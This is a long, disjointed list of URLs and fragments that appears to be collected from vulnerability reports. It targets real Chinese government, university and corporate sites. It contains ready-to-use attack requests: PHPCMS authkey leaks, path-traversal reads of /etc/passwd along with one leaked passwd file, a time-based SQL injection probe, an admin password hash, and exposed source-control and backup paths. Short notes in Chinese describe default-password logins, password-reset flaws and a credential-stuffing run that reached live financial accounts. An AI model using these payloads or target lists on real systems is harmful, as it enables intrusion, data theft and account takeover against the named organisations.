http://www.yckfq.gov.cn/api.php?op=get_menu&act=ajax_getlist&callback=ceshi&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://www.yckfq.gov.cn/api.php?op=phpsso&code=9a67AwEHAwIBVAUBBQ9WBlpdA1UBVVBSUVdSXVcEAkQIXV4OQk5dXl4DXF8TTFpWBB4SVwtVSkMACQQHQUVQEAdAX14ZRFZeVAdBEVZWRlxNERgfSVINXgYEFUwdFgRcBFFEExlEVl5UB0ERHWp2fnx6ZhYBWBFEDAsCEBUGDl4CU0QbAU8BAR0RRlRHV1JfXBUCTlZQTkAEFhITWhcFHFFKAgAYF3VgfikVFmpYV19QVxJaDFwLREVVTVUcTEFWE11dE1hZVV1DCVRFXFZdbUpaWlMIUExEBAcNAUZFDVkMW0QTARsCGx0CWV5aSxtAWFdWHlUYSAJMTBlEUxcOXUFbXlVeRV5TRQ1aX2pKUFpcVFMYEVAAXAAWQQNHChRAQVBJE0keUhsS http://aio.hkairlines.com/ac3s/fortunewings/searchMember http://www.epicc.com.cn/shoujirenbao/ http://221.228.242.122/ http://mail.cits.com.cn http://jpk.sicnu.edu.cn/exercises/exercires_stuexamshowinfo.asp?cno=201019&cid=1 http://jpk.sicnu.edu.cn/kcListT.asp?nf=2008 http://jpk.sicnu.edu.cn/satAdmin/getserverfile.asp inurl:http://c.highpin.cn/Job/JobChanceAnonymous?Encryptid= http://c.highpin.cn/Job/JobChanceAnonymous?Encryptid=562C063659365E611F350769026B9&FromEmail=192C40360C361F6149355A69596B0F2C523629365A611A350569186B022C5A3604369&FromType=6 http://c.highpin.cn/Job/JobChanceAnonymous?Encryptid=562C033650365D6119350F69016B9&FromEmail=0D2C4036063601615F350369046B542C753658365D611F351869556B0E2C58369&FromType=14 http://218.30.108.51/t.php http://218.30.108.51/smarty_temp/views/autodata/listtask.php http://www.snjrsj.gov.cn/hbwz/testword?methods=writeWord&id= http://www.ss12333.com/hbwz/testword?methods=writeWord&id= http://www.hbsz12333.gov.cn/hbwz/testword?methods=writeWord&id= http://www.hbxg12333.gov.cn/hbwz/testword?methods=writeWord&id= http://www.xianlife.com/shop/index.php?act=login&op=forget_password http://git.100msh.com admin:22147b87d364edd75ac7073612b0988e http://www.tszsj.gov.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin 
http://www.tszsj.gov.cn/api.php?op=phpsso&code=f5ccAwUAAgMBVlJRVQQAUFdXDFdUWQRTBFNTBVRWVk1bWA8ORklcX14BCw9DRl4FDhIUAFkFThVTXQNVFxcEGVRFDl4dQ1dfVAUWQQZcQg9HHR5IGwIJCFVQEh5LRFBVV1QVEx1DV19UBRZBTWByLXZ2YEFTCBUSX18FQkNUWldRVhUbBUgAAB0TEQQXXVYMVhkEGQQAShZXQhVBDEVRFQJPUwAcEHRhfitCRjpSUwxaWxQNXgwPEhYBSgdKHhVfQFgME1xeVFxDCwMVDFxZPkBWXARaAEgSV1MKUxAXWVBfXhUTBRwDGh0ADg4KQR8TUltQSQdITFQfGB4WBUVaVBJeD1VaQl9SRQ8NDzpAVAlWWFVPQwAEClNCRlERWEBJElUYE00ZUxoS inurl:www.99bill.com/rmouter/mReply/mReply.htm?sendEmailId= http://www.dt.gov.cn:8080/contents.php?id=9503 http://tseller.tshenbian.com/view/login.php?action=login http://nfs.pdsagri.gov.cn/FCKeditor/editor/filemanager/upload/test.html http://nfs.pdsagri.gov.cn/FCKeditor/editor/filemanager/upload/test.html http://www.qysi.gov.cn/websys/jsp/website/emailbox/emailbox_view.jsp?ROW_ID=201408070000031704 https://exmail.qq.com/ http://www.jluzh.com/mysqladmin/index.php http://101.129.1.201/ http://223.202.23.7/ http://user.mofangge.com。神奇的发现里面有一个接口,看样子是获取手机号码的.于是,我填了一个很靓的魔方格帐号,成功了 https://mall.gree.com/mall/FindPasswordView?storeId=10652&catalogId=10001&langId=-7 http://www.aokang.cn/point.html http://mbs.zufangzi.com/gms/order/contractApiController/getContractListByCustomer.do?customerId=317134 http://mbs.zufangzi.com/gms/order/contractApiController/getContractListByCustomer.do?customerId=318014 http://mbs.zufangzi.com/gms/ddAZQGY/pdf/contract/20150112/PEK10023456.pdf?contractId=32022&agentId=2233&orderItemId=334455 http://mbs.zufangzi.com/gms/ddAZQGY/pdf/contract/20150509/PEK10027843.pdf?contractId=30614&agentId=1789&orderItemId=251701 http://mbs.zufangzi.com/gms/ddAZQGY/pdf/contract/20150508/PEK10027478.pdf?contractId=30218&agentId=2111&orderItemId=253042 http://jw.sxjgxy.edu.cn/ http://220.167.53.63:81/ http://jwmis.dzvtc.edu.cn/ http://score.xaau.edu.cn/ http://jwgl.lynu.edu.cn/ http://www.cdtlgcxx.com:2110/ 
http://www.lznews.gov.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://www.lakala.com www.lakala.com http://chebixia.com/ http://selfhelp.csgwbn.com/ http://123.232.100.133:8080 http://yhbz.chinasafety.gov.cn:8003/lhdlxjk-aj/ http://www.stats.gov.cn/tjsj/tjbz/xzqhdm/201504/t20150415_712722.html m.zhongsou.com/.svn/entries http://un.zhongsou.com/.svn/entries http://doogua.dangdang.com/auth http://58.61.29.110/main.aspx http://221.232.64.211:8080/git/Flex/atm.html URL:http://ask.csdn.net/?sort_by=created_at&type=unsolved http://pn.sina.com.cn/reg_list.php?od=5&of=js&pid=5&tids=11&type_u=1 https://github.com/JerryLiang/api/blob/b6807044590b6f3988f5f54f7dc33f636257aa6f/.svn/pristine/0c/0cf5eaeefe2f4e7aa87c2e26f3e1f8592dc20159.svn-base https://github.com/JerryLiang/api/blob/b6807044590b6f3988f5f54f7dc33f636257aa6f/.svn/pristine/eb/ebe0edd60d7e3fa9d2807c3e129a0c4522d8d3c7.svn-base https://github.com/JerryLiang/api/blob/b6807044590b6f3988f5f54f7dc33f636257aa6f/.svn/pristine/eb/ebe0edd60d7e3fa9d2807c3e129a0c4522d8d3c7.svn-base https://github.com/JerryLiang/api/blob/b6807044590b6f3988f5f54f7dc33f636257aa6f/.svn/pristine/c1/c16c5996f487c85e575d76b84a483b7529dafb6d.svn-base https://github.com/JerryLiang/api/blob/b6807044590b6f3988f5f54f7dc33f636257aa6f/.svn/pristine/17/17ef360027f3fd5f39058359f232c6726b719ce2.svn-base http://cbapi.iddsms.com/smspro.php?userId=J22088&password=********&pszMobis=***********&pszMsg=%E4%B9%8C%E4%BA%91%20%E5%A4%A9%E5%9C%B0%E4%B8%8D%E4%BB%81%E4%BB%A5%E4%B8%87%E7%89%A9%E4%B8%BA%E5%88%8D%E7%8B%97%20%E6%B5%8B%E8%AF%95&iMobiCount=1&pszSubPort=*&type=1 http://www.aokang.cn/ http://www.itsmv.com/_d276389259.htm http://www.ctnma.cn/,中国电信-综合办公系统,应该是新疆电信的,存在原始密码,用常用用户名和原始密码123456可得到不少可用账号,修改密码登陆后可以看到新疆电信高层和员工联系方式。 http://seller.cctvmall.com/cshop/page/page_book_v_cs_sellororder?zw_f_order_code=DD150711100010 
https://passport.eteams.cn/password http://www.peaksport.com/candidate.php?subject=%E6%8B%9B%E5%95%86%E4%B8%93%E5%91%98&rid=290 http://www.airchinajet.com/bjhk_en/stations/5154f5fd07f/index.php/5167d8580a?id=17 http://www.airchinajet.com/download.php?url=2013/../../../config.php http://www.airchinajet.com/do.php http://www.airchinajet.com:8080/stations/5154f5fd07f/manager/login.php/login http://www.airchinajet.com:8080/page/do.php/5154f5fd07f/code/5173af000a http://mpweixin.com/微信管理入口地址http://api.mpweixin.com/index.php?g=Home&m=Index&a=login存在注入漏洞,导致大量微信公众号信息泄露。 https://mail.21vianet.com http://doogua.dangdang.com/ http://icp.now.cn:80/post.php http://cc.yundasys.com:8087/callcenter_new/popedom/userLogin.action http://220.191.211.53/jnjp/login/Jeecms.do http://mobile.cqyjs.com:89/ http://oa.cqyjs.com:8080/ http://mail.cqyjs.com/ http://mobile.cqyjs.com:89/m1/login.do http://oa.cqyjs.com:8080/ http://hzjj.hzga.gov.cn/web/jgdt/info.aspx?newid=2423 http://202.121.241.187:8088/login.action http://60.209.238.28:8080/qdqts/productInfoBarCodeManagerInit_barCodeInfoInit.action存在命令执行漏洞 active:yes http://www.imre.gov.cn/Inspire/js/common/cmsUploadImage.action?imgUrl= http://www.imre.gov.cn/Inspire/upload/sysup/2015-07-24/201507240930086442.jsp http://www.ahty.gov.cn/ http://www.ahty.gov.cn:8080/defaultroot/sp/login.jsp http://buy.ccb.com/ http://**.**.**/ http://tzb.hit.edu.cn/campus_news.asp?id=717 http://e-booking.net.cn/login.html http://www.epeaksport.com http://www.epeaksport.com/XP001-MemberDatum/saveData.html http://token.bizcn.com/token.tar.gz http://tongji.diandao.org/.git/ https://**.**.** http://www.ijindun.com/News/gonggao/212615.html http://221.231.103.226:8008/login.do http://221.231.103.226:8082/logino.php http://www.ahyx.cc/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://mail.sasmac.cn/ http://wx.50cms.com/wwwroot.rar 
http://www.hubeisafety.gov.cn/sample/up_board4.asp www.hubeisafety.gov.cn http://www.hubeisafety.gov.cn http://www.hbcz.gov.cn http://www.hbcz.gov.cn:7001/XZQHQueryWAR/xxcx/nrcx.jsp?code=421087&bkj=D421087 www.hbcz.gov.cn:7001 http://www.hbcz.gov.cn:7001 http://www.diandao.org/qiye/index.php/Home/Index/showalternate?id=804%20AND%20SLEEP%285%29 http://sso.888.cn/sso/login http://scm.888.cn:8091 https://github.com/s016374/ztx-autotest/blob/a6456b00235ba4659064bb546a3d2b86cd8708ee/ztx-util/src/main/resources/mail.properties http://**.**.**.**:8090/opac/xskp.jsp?kzh=zyk0006417&dztm=&dctm= http://www.szcgs.com.cn/wscgs2/Query_cond.aspx www.szcgs.com.cn http://www.hitem.cn/news_detail.php?id=34 http://login.5ebo.com/api.php?op=game_list_api&gid=9&count=3 http://zhongyi.ifeng.com/uploads/userpic/201507241318276113.aspx http://service.homelink.com.cn/wct/demand/outEntrust/toIndex http://tc.homelink.com.cn/Login.aspx http://wooyun.org/bugs/wooyun-2015-0128481 http://wooyun.org/bugs/wooyun-2015-0123889 http://www.nmca.gov.cn/web/yj.php?id=83&f_id=28&jb=2 https://222.133.0.219/Welcome.enlink?actType=init http://10.116.129.34:81/isbm/ ftp://14.23.175.4/ http://www.sdytjy.cn/ http://www.zteclouds.cn,中兴云服务 http://www.zteclouds.cn/portal/user/forget.htl http://www.zteclouds.cn/portal/user/resetPassword.htl,表单内容就是用户名(邮箱),和新密码两个参数,直接提交这个表单就可以重置: http://124.251.36.97:8080/#/login http://www.hzuni.com:80/ www.hzuni.com http://172.16.1.11.xip.io http://www.172.16.1.11.xip.name http://ilife.homelink.com.cn/aigou/?c=index&a=detail_pinglun&id=10125 http://www.qhflh.gov.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin 
http://www.qhflh.gov.cn/api.php?op=phpsso&code=5045BAQHUQIJAlRSAVIFUlNUAlEFAQFRVAJQUVFVBhYMXVgJR04PXlZVDQwXFltQXkMVBQ9THEEAWlQBFhRUQgNAWVkcRAReXFEQQlIMR1oXTB9NTVRbXAZXRUpKRwAOAFFCFBxEBF5cURBCGTB3eCYnYUQFXkdGDFhSFkJXCgwGU0IcBE9TARVHFwdDDVNZBkgFHFJWGEIERUIVDUYBTlVKBAcdFydgdn9ERW4CVlkKChUICFpdRkUGHVNLHUUEF11bFF1ZB11LXwUWWAxcaxAHXQEMVhpGBFRdBxEUCQsIW0IUBBtQGxVUCA1eERpGAgpRTFEeHgBMH0lCBEYKD0VbWFJbRQxTTVsLDG4QUVwGCVRKFVZWXgBFEQUQWxASRVBPFEweABsa http://ilife.homelink.com.cn/aigou/index.php?m=PersonalCentre&a=addressEdit&adId=10000 http://mail.zhuhai.gov.cn/coremail/index.jsp http://new.citsbj.com http://zyyd.media.open.com.cn/picadmin/seepaper.asp?id=1472001&course_id=0001 http://61.157.117.68/advance/index.htm http://kaoshi.sankuai.com/ http://kaoshi.sankuai.com/kaoshi/user/getpwd/back http://media4.open.com.cn/L603/dongshi/zhongxiaoxxzjxyj/detail_mingci.asp?id=213 http://hz.5i5j.com/regLogin/phoneLogin http://hz.5i5j.com/regLogin/register http://easyxiu.zol.com.cn/H/ http://easyxiu.zol.com.cn:80/H/ eat.gd.sina.com.cn/include.tar.gz http://fz.fjycw.com/news_search.aspx http://go.cqcb.com/mobile/index.php http://www.cqcgs.gov.cn/1.rar http://**.**.**.**:9080/qsksyy/ www.now.cn www.now.cn http://law.cqupt.edu.cn/kecheng/xs/exam.php?id=&cat_id=10 http://m.edingtou.com/member/common/forgetpwd1 http://m.edingtou.com/member/common/resetpwd http://update.haozip.2345.com/ http://download.2345.com/haozip/ http://update.haozip.2345.com/ http://hq.sicnu.edu.cn http://119.146.222.247/eagleye/clientUpgrade.do?filePath=../../../../../../../../../../var/www/html/index.html http://119.146.222.247/eagleye/clientUpgrade.do?filePath=../../../../../../../../../../etc/passwd http://www.lwga.gov.cn/ http://www.lwga.gov.cn/station/newslist.php?sortid=2&mid=chengdong&page=1 http://www.zhong-bei.com/common.asp?id=2 http://sqlmap.org http://www.epeaksport.com http://www.hljiic.gov.cn/pages/MainPortalSearchList.aspx?SearchText=2015&NodeID=0 ftp://120.196.135.123/ 
ftp://120.196.135.123/ucpbossbackup20111114/uetong/website/web.config http://boss0752.uetong.com http://0752.uetong.com http://www.cmsmc.cn/index_html.shtml http://www.cmsmc.cn/zhaopin/login.jsp http://www.cmsmc.cn/zhaopin/resume/resume_create.action http://is.gd/xxxxx http://www.108.com.tw/main04/108news/news_detail.php?Id=155 http://www.fjipo.gov.cn/templates/znjs.jsp?colid=2&fid=2 http://**.**.**/console_ http://**.**.**/newsedit/ http://hope.sdydf.gov.cn/siteadmin/login.htm http://221.228.17.58/dataImporter/checkdownload?c=9887213060&cn=%E5%AE%9C%E5%85%B4%E5%B8%82%E4%BE%9B%E7%94%B5%E5%85%AC%E5%8F%B8 https://ay.pingan.com http://m.p2p222.com/index.php/user/Login.html http://glodon.com/bin.rar http://glodon.com/p/info_childc http://glodon.com/p/info_childc http://sqlmap.org http://www.glodon.com/en/ http://www.juyoutan.com/ https://m.touna.cn/sign-in.html,此处虽然已经对登陆进行了限制,比如同一用户名连续尝试登陆十来次就需要输入验证码,这能够防止爆破,但未对撞库进行限制,撞库时对密码进行了md5加密,用burpsuite对密码进行一下加密即可,利用泄漏的库只撞了四十来万撞得三十多个有效账号,可在电脑端:https://www.touna.cn/user-login.html登陆,登陆进去里面涉及金钱,虽然手机号码中间四位打码了,但由于之前未对同一密码用户名输入次数进行限制,导致根据密码爆出电话号码,下面的账号密码麻烦管理员审完后打一下码。 com:8087 com:8087 com:8087 https://mail.galaxyasset.com http://pc.ejoboo.com/findpwd http://pc.ejoboo.com/previewResume?resumeId=227451&v=1 http://**.**.**.**:81/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/csccmise/fckedit//editor/filemanager/browser/default/connectors/test.html http://**.**.**.**/backmanage/fckedit//editor/filemanager/browser/default/connectors/test.html http://**.**.**.**/wbgm/fckedit//editor/filemanager/browser/default/connectors/test.html http://125.35.11.200:8002/console/ http://125.35.11.200:8002/jmxroot/jmxroot.jsp jdbc:oracle:oci:@crosssy"/ http://125.35.11.200/CrossWebApp/ http://125.35.11.201:7001/console/ http://125.35.11.201:7001/jmxroot/jmxroot.jsp www.yuanping.gov.cn整个网站都是注入点 http://www.gxepb.gov.cn/zxjc/login.jsp ftp://124.65.152.122/ https://career.huawei.com/recruitment/servlet/getHeaderInfo 
https://career.huawei.com/recruitment/servlet/getUserResumeInfo http://friday.sinaapp.com/huawei.html www.egjyc.com.cn http://jr.tuniu.com/ http://www.zhtongshi.com/manage/export/cardInfoQuery.do http://118.114.245.80:1234/ http://www.sodao.com/zone/100542498/catalog http://**.**.**.**/Platform/Login?ReturnUrl=%2fportal%2f http://**.**.**.**:8080/servlet/editput?sid=2&qid=2 http://**.**.**.**:8080/servlet/editput?sid=1&qid=51 http://**.**.**.**:8080/servlet/editput?sid=1&qid=146 http://**.**.**.**:8080/servlet/editput?sid=1&qid=4 http://**.**.**.**:8080/servlet/editput?sid=1&qid=11 http://**.**.**.**:8080/servlet/editput?sid=1&qid=155 http://**.**.**.**:8080/servlet/editput?sid=1&qid=12 http://**.**.**.**:8080/servlet/editput?sid=1&qid=602 http://**.**.**.**:8080/servlet/editput?sid=1&qid=4 http://**.**.**.**:8080/servlet/editput?sid=1&qid=355 http://www.qjwsgaj.gov.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://eyemain.znv.com/wq/login.action http://60.28.205.41:8280/shouji/feedback/main.jsp?plat=all&prod=all&instsrc=all&begintime=2010-07-23&endtime=2015-07-25&orderby=time&asc=0&pn=2805 http://eip.crcchem.com/login/Login.jsp?logintype=1 http://eip.crcchem.com/login/VerifyLogin.jsp http://club.mangocity.com/comment/scenicspot/scenicindex.aspx?code=hainan http://bdm.psych.ac.cn/peoplelist.php?name=%E6%9D%8E%E7%BA%BE http://bdm.psych.ac.cn/activitylist.php?title=%E8%AF%BE%E9%A2%98%E7%BB%84%E5%9C%A8%E5%9B%BD%E7%A7%91%E5%A4%A7%E6%80%80%E6%9F%94%E6%A0%A1%E5%8C%BA%E6%B4%BB%E5%8A%A8 http://bdm.psych.ac.cn/projectlist.php?title=%E5%9B%BD%E5%AE%B6%E8%87%AA%E7%84%B6%E7%A7%91%E5%AD%A6%E5%9F%BA%E9%87%91%E9%9D%A2%E4%B8%8A%E9%A1%B9%E7%9B%AE%E2%80%9C%E7%AA%81%E5%8F%91%E5%85%AC%E5%85%B1%E4%BA%8B%E4%BB%B6%E5%90%8E%E4%B8%AD%E5%9B%BD%E6%B0%91%E4%BC%97%E7%9A%84%E5%90%8E%E7%BB%A7%E9%A3%8E%E9%99%A9%E5%86%B3%E7%AD%96%E2%80%9D http://bdm.psych.ac.cn/login.php 
https://m.airchina.com.cn:9061/worklight/apps/services/api/AirChina/iphone/query cn:9061 http://www.bpzykh.com/examStudentView_info.do?action=info&ep_id=1437&es_id=25454 http://www.kakayinzhang.com/index/mainAction.action存在命令执行漏洞 www.gfortune.com.tw http://gra103.aca.ntu.edu.tw/cpt/queryall/default.asp http://www.lbsfj.gov.cn/ http://www.lbsfj.gov.cn/jsp/cmsNews/cmsNewsViewLBSF http://blog.itpub.net/site/login/ http://api.resume.hiall.com.cn/config_global.bak https://113.106.87.87/por/login_psw.csp?rnd=0.5778109325760672 https://ehs.crc.com.cn/aqsc/,用户名处存在SQL注入,用户名处输入 www.dmall.com www.dmall.com/www/ http://m.dmall.com/order/detail/19287851# http://m.dmall.com/order/detail/19287805# http://m.dmall.com/order/detail/19287855# http://m.dmall.com/order/detail/19280568# http://m.dmall.com/order/detail/14000002# http://m.dmall.com/order/detail/15000001# http://m.dmall.com/order/detail/16000001# http://m.dmall.com/order/detail/17000001# http://m.dmall.com/order/detail/18000001# http://m.dmall.com/order/detail/19121234# www.ganji.com http://radio.wanmei.com:8888/WEB-INF/web.xml http://radio.wanmei.com:8888/WEB-INF/applicationContext.xml http://radio.wanmei.com:8888/WEB-INF/jms-config.xml http://radio.wanmei.com:8888/WEB-INF/action-servlet-zhanghua.xml http://edi.panasonic.cn:8088/login.aspx http://220.181.20.114/ https://api.wan.sohu.com/ https://220.181.20.114/ https://vpn.bjchy.gov.cn http://it.crcgas.net/search.aspx?id=a注入点id http://it.crcgas.net/search.aspx?id=a Thuner.app/Contents/MacOS目录下的Thunder文件 http://www.uleapp.com/ https://sslvpn.hebut.edu.cn http://eip.crcchem.com/tools/SWFUpload/upload.jsp http://eip.crcchem.com/tools/SWFUpload/upload.jsp height:20px;BORDER encap:Ethernet A3:51:E2 addr:192.168.100.88 Bcast:192.168.100.255 Mask:255.255.255.0 fea3:51e2/64 Scope:Link MTU:1500 packets:4592364255 packets:5341551626 txqueuelen:1000 http://career.crc.com.cn/hrjob/index.jsp http://www.jishunda.cn/News.asp?xwlb_id=36 https://218.22.39.88:8443/ 
http://202.110.116.141/zindex.jsp http://yfg.mszq.com/zindex.jsp http://202.110.116.141/.svn/entrie或者http://yfg.mszq.com/.svn/entries http://202.110.116.141/repository/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../ http://wenku.baidu.com/view/181c1308f78a6529647d53ef.html https://222.35.57.109/ https://222.46.120.11/ http://www.ydthlife.com/ http://www.huxiu.com/user/find_passwd http://zjy.gdcost.com/print/examPermitCert.aspx?id=53187 http://kaoshi.china.com/zlzx_new/GetZx.asp?ntypeid=117&typexpd2=kjz&zlzx=article&procity=&qq-pf-to= https://www.hc3cbank.com.tw/labor_new/Default.aspx http://www.chinartc.com:80/dev/downloadman/getDownLoadInfoByType.do?downLoadType=1 http://ticket.gdcd.gov.cn/OrderDetail.aspx?OrderNo=2015060600000665578&Key=e915b112-bfe0-4316-870d-48a47828f310 http://ticket.gdcd.gov.cn/OrderDetail.aspx?OrderNo=2015060600000665579&Key=e915b112-bfe0-4316-870d-48a47828f310%27 http://ticket.gdcd.gov.cn/OrderDetail.aspx?OrderNo=2015060600000665581&Key=e915b112-bfe0-4316-870d-48a47828f310 http://jcy.njgl.gov.cn/zxfw/zxfw/RoutineOrderAction_addOrder.action http://zsb.swpu.edu.cn/phpmyadmin/ http://zsb.swpu.edu.cn/phpMyAdmin、phpinfo.php http://yinghezhong.com/?m=../../../../../../../../../../etc/passwd%00 http://ityw.gxer.net/public/db/gxsmp130528171926.sql http://ityw.gxer.net/ http://houtai.springtour.com/ http://www.bohp.com.cn/pingpai_ny.asp?id=158&cid=89 http://tudou.hiall.com.cn/yll.txt http://218.27.137.242:8080 http://222.177.213.190:8888 http://117.132.15.88:8001 http://221.224.116.210:81 http://221.238.243.237:8000 http://218.27.137.242:8080/Server/CmxcheckuserMachine.php?b=1&a=1%bf http://www.ziyang.gov.cn/public_catalog_ay/t.aspx?i=20110908184151-311371-00-000 http://pub.jian.gov.cn/jxjax/bmgkxx/wfz/fgwj/qtygwj/201209/t20120929_985896.htm http://ymsa.mohurd.gov.cn/ http://sam.pkusz.edu.cn/artion/search.php?search=clnphp1995&langs=cn&key_clnphp=2 http://home.gmw.cn/.svn/entries 
http://p.gmw.cn/.svn/entries http://www.91student.com/admin/popups/insert_image.html http://www.91student.com/admin/popups/insert_image.html http://www.91student.com/admin/plugins/FullPage/test.html http://www.wx777.com.cn/show/menu/MenuAction!toSmallLogin.action?mId=4 http://eip.crcchem.com/wui/theme/ecology7/page/login.jsp http://221.7.246.44:7001/defaultroot/login.jsp http://ks2.jtzyzg.net/predetection/printOnlyTestCardAction.do?method=printNew&projectId=100000&enrollmentId=188812 http://ks2.jtzyzg.net/predetection/printOnlyTestCardAction.do?method=printNew&projectId=100000&enrollmentId=188813 http://218.28.166.67:7001/console/ http://218.28.166.67:7001/jmxroot/jmxroot.jsp http://202.115.194.40 www.donews.com www.donews.com http://subcompany.crgdpharm.com/ http://subcompany.crgdpharm.com/login_check http://activity.3gsc.com.cn/activity/.svn/entries http://jxfcga.gov.cn/develop.php http://exam.cuit.edu.cn/Ashx/Delete.ashx?_=1433675537288&id=1&action=GUEST http://202.115.194.143 http://202.115.194.143/PsManage/Login.aspx http://wooyun.org/bugs/wooyun-2010-064027 https://222.89.245.67/por/login_psw.csp http://123.59.10.37/info.php http://www.himovie.com/ http://180.153.225.230/ http://202.115.194.105/index.asp http://202.115.194.105/news_veiw.asp?id=126 https://122.224.120.4 http://180.169.48.252/REM2/ www.weifengke.com http://1jiaoshi.com/points/pointsShow.html http://www.scgysf.gov.cn/ http://www.scgysf.gov.cn/gbook_info.asp?gid=2443 http://www.jhun.edu.cn/jdept.asp?dept=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23%27%40%21%5C http://www.21train.cn/frontaid/Nallinfo.jsp?infortype=2 http://www.21train.cn/support/onlineexam/student/befview.jsp?examid=3259 http://www.21train.cn/Classroom/Nindex.jsp?type=23 http://bpm.zsmz.com:806/print/guaranteeprintshow.aspx?cardid=384343 http://222.221.17.161/asppage/chinese/index.asp?ID=YWRtaW46YWRtaW4= 
http://www.suguo.com.cn/index_bro_hp.asp?pagno=0&sm=1&title=1 http://www.suguo.com.cn/index_broj.asp?sm=%D7%DF%BD%F8%CB%D5%B9%FB&bz=%CB%D5%B9%FB%BD%E9%C9%DC http://www.suguo.com.cn/index_brom.asp?sm=%BC%D3%C3%CB%D0%C5%CF%A2&bz=%BC%D3%C3%CB%B8%C5%BF%F6 http://www.suguo.com.cn/index_brow.asp?id=3161&bzsm=1 http://www.suning.cn/snsite/console/sn_info.jsp http://www.suning.cn/snsite/sn_user.do?method=editForm&userid=3 data:user=3 http://www.suning.cn/snsite/sn_user.do www.phfund.com.cn/Downloader?filePath=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.pdf root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin 
avahi-autoipd:x:100:159:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin oracle:x:54321:54321::/home/oracle:/bin/bash weblogic:x:1000:54321::/home/weblogic:/bin/bash http://eip.crcchem.com/login/Login.jsp?logintype=1 https://vpn.fzu.edu.cn/ http://wenku.baidu.com/view/2e025bfd9ec3d5bbfd0a7446.html http://www.chengxianju.com/readnew.php?id=961 http://www.chengxianju.com/vacation_show.php?id=6 http://211.147.149.70/BJMonitor/ www.nffund.com http://www.nffund.com http://219.134.61.11:81/Login.jsp http://api.diandao.org/ios/get_order?token=xxxxxxxxxxxxxxxx&order_id=1231235927303333 http://**.**.**.**:81/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://www.cvma.org.cn/EnterpriseList.aspx?type=1 http://www.cvma.org.cn/EnterpriseList.aspx?type=1 http://www.zhaokao.net/column2.jsp?colid=18576&pid=18557 http://www.zhaokao.net/man/pub/default.jsp http://218.75.77.170/zj_web/si/pages/person/index2.html http://www.ssybw.com/news_show.asp?id=124 http://www.ssybw.com/admin/login.asp http://mail.kuaidigroup.com http://gsk.inspur.com/User/LoginInSampleA http://**.**.**/coremail/index.jsp http://**.**.**.**:81/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://www.cofcoyoucai.com/ http://www.sdjrzs.com/ http://www.crproperty.com.hk/admin http://online.suning.com/console/ http://online.suning.com http://wcfhost.tms.jiuxian.com/ http://www.ulearning.cn/ulearning_web/web!course.do http://www.sxgxbys.com/cxxt/admin/left.asp http://www.sxgxbys.com/cxxt/admin/login.asp http://183.224.40.177:8082/login/CmsSubmit.do http://self.10010.com/axis2/axis2-admin/login http://vip.crvole.com.cn/account/verifyEmail?email= https://gate.chemchina.com/por/login_psw.csp http://www.ylzhzf.gov.cn/ http://**.**.**.**/bugs/wooyun-2015-0120725 https://github.com/joeiren/washu-jk/blob/3187faee0f436e9700eb240c891c9897031ca2d8/wasu-commerce/conf/routes 
